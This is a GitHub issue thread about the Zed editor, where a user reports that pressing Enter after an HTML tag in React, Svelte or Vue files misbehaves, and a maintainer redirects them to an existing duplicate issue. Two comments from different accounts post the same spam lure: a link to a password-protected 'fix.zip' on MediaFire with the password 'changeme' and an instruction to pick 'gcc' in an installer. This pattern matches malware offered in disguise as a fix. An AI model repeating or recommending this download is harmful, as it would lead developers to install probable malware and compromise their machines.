### ISSUE TITLE
Front-end is not written.

### ISSUE THREAD

**Issue by Queaxtra** [zed-industries/zed#16956]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

I'm trying to write front-end code with Zed but it makes my job more difficult. When I create an html tag on React, Svelte or Vue and press enter, I get a ridiculous error.

### Environment

Zed: v0.149.6 (Zed)
OS: macOS 14.5.0
Memory: 8 GiB
Architecture: aarch64

### If applicable, add mockups / screenshots to help explain present your vision of the feature

Before pressing Enter.
<img width="174" alt="image" src="https://github.com/user-attachments/assets/e496d1ec-0a1a-47af-a4e2-1271c91a834a">

After pressing Enter.
<img width="141" alt="image" src="https://github.com/user-attachments/assets/9e69bb88-955e-4e03-8d43-421f66d4b49b">

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JosephTLyons** [comment]
Hey @Queaxtra, I think your request is the same as this one, which has a handful of upvotes (👍) already. Would you mind upvoting that one?

- https://github.com/zed-industries/zed/issues/12064

**Comment by Queaxtra** [comment]
@JosephTLyons All right, I did what you said.
